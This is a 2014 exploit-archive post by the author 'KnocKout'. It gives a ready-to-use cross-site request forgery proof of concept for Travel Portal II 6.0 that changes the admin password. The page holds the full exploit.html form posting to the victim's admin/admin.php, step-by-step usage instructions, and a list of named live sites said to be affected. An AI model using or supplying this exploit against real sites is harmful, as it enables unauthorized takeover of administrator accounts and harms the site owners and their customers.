Home / exploits Travel Portal II 6.0 Cross Site Request Forgery
Posted on 13 September 2014
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact(onlymail) : knockout@e-mail.com.tr [~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379 [~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x.. Unuttuklarýmýz affola.. ############################################################ Turkey Security Group 'h4x0re SECURITY' ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Travel Portal II (6.0) |~Affected Version : II 6.0 and predecessors.. / all version |~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html |~PRICE : 349 Euro |~RISK : High |~Google Keyword/Dorks : N/A |~Tested On : Kali Linux Mozilla Firefox ####################INFO################################ admin password can be changed easily.. ####################Usage Exploit######################## Exploitation Edit to exploit.html target website.. Open exploit.html your browser.. Determine your new password. GO TO ADMIN PANEL.. ####################Example affected sites & Tested on##### http://travelportal.tourismscripts.com/ ( Official Demo ) http://almarjanmakkah.com http://www.istanbulairportal.com ==============================================================================00 Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html ==============================================================================0 <h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3> <table> <tr> <form method="post" action="http://[VICTIM]/admin/admin.php"> <input type="hidden" name="admin_id" value="1"> <td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td> </tr> <tr> <td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td> </tr> <tr> <td></td><td><input type="submit" name="submit" value="Update Password"></td> </form> </tr> </table> ================================================================================= .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / /
